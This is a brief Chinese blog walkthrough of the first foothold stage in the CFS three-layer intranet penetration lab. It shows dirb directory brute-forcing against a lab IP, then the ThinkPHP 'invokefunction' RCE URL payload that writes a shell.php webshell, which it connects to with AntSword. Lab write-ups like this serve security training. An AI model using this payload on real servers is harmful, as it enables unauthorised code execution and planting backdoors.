CFS三层内网渗透——外网打点(一)

07-08 1005阅读

目录

外网打点

先爆破一下看看有没有啥可进攻路径

尝试那个可疑的路径发现是thinkphp这个框架,同时也知道了版本,那就nday打吧 

写入php

​编辑写入php成功,简简单单nday拿下​编辑

蚁剑rce尝试链接

打点成功

外网打点

CFS三层内网渗透——外网打点(一)

先爆破一下看看有没有啥可进攻路径

dirsearch,dirb,gobuster等工具都可以尝试

dirb http://192.168.20.130/

CFS三层内网渗透——外网打点(一)

尝试那个可疑的路径发现是thinkphp这个框架,同时也知道了版本,那就nday打吧 

CFS三层内网渗透——外网打点(一)

 写入php

http://192.168.20.130/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=

CFS三层内网渗透——外网打点(一)写入php成功,简简单单nday拿下

http://192.168.20.130/public/shell.php

CFS三层内网渗透——外网打点(一)

蚁剑rce尝试链接

CFS三层内网渗透——外网打点(一)

 打点成功

CFS三层内网渗透——外网打点(一)

VPS购买请点击我

文章版权声明:除非注明,否则均为主机测评原创文章,转载或复制请以超链接形式并注明出处。

相关阅读

目录[+]